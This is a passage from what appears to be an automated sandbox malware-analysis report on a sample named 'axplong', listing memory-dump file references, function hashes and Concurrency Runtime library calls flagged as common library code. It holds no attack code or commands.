                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 932774601-0
                                                                                                                                                                                                                                                    • Opcode ID: 3f6d47f3fda163cce28f57e694fdf818206f701e3ef726abec83b392e8a7b3c7
                                                                                                                                                                                                                                                    • Instruction ID: 0ce4321c7fe37217244f3a315a9334b440990a908ad56e7a4cf75e90f595b85a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6d47f3fda163cce28f57e694fdf818206f701e3ef726abec83b392e8a7b3c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F218C31500A149FCB65EFA5D9908AAB3FABF48704700495DE442A7A61DB34B905CBAA
                                                                                                                                                                                                                                                    Function 006947B5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 006947C3
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 006947D5
                                                                                                                                                                                                                                                      • Part of subcall function 00695485: _InternalDeleteHelper.LIBCONCRT ref: 00695494
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 006947DF
                                                                                                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 006947F8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3844194624-0
                                                                                                                                                                                                                                                    • Opcode ID: dfc0a91ac89a1492c5af16a60f14429f1c12a6b5a003e0b10da408fb7001794c
                                                                                                                                                                                                                                                    • Instruction ID: df1e1cbae4562bf1ec4c863acf18b4506fafaeca063c576e22acbfc7038e0390
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfc0a91ac89a1492c5af16a60f14429f1c12a6b5a003e0b10da408fb7001794c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F01A271600521BFCEA6BF60D9C2EBE776FBF45B103000129F5055BA51CF20E85297E6
                                                                                                                                                                                                                                                    Function 0069ED8C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069ED9A
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069EDAC
                                                                                                                                                                                                                                                      • Part of subcall function 0069EE59: _InternalDeleteHelper.LIBCONCRT ref: 0069EE6B
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069EDB6
                                                                                                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 0069EDCF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3844194624-0
                                                                                                                                                                                                                                                    • Opcode ID: a67adf2b3b085a77f068f23d5789d0f74eb8b470df8727c37bd99d796de0ae17
                                                                                                                                                                                                                                                    • Instruction ID: d4ef715ac0d8b2b45bd19537ccaa56b101524118b5b6849179b532386d147a84
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a67adf2b3b085a77f068f23d5789d0f74eb8b470df8727c37bd99d796de0ae17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D901D671200521AFDE55FB60C8C2EAE776FBF44710700012DF5149BA52CF22AC1557A5
                                                                                                                                                                                                                                                    Function 0069CFE7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069CFF5
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069D007
                                                                                                                                                                                                                                                      • Part of subcall function 0069C5E2: _InternalDeleteHelper.LIBCONCRT ref: 0069C5F4
                                                                                                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0069D011
                                                                                                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 0069D02A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3844194624-0
                                                                                                                                                                                                                                                    • Opcode ID: 021c35f99e696365700778a5212f436101e761b4b9c661d99fe32f38f7507521
                                                                                                                                                                                                                                                    • Instruction ID: ecac79aa27b6b2bda7037fd061dbdab5ffc6d38f1896876e11d8a6d5e8367972
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 021c35f99e696365700778a5212f436101e761b4b9c661d99fe32f38f7507521
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5101A231600521BBDE697F60C9C2ABEB76FBF48720711013DF50597A52CB20EC2297A5
                                                                                                                                                                                                                                                    Function 006A32EE Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006A3308
                                                                                                                                                                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 006A331C
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 006A3334
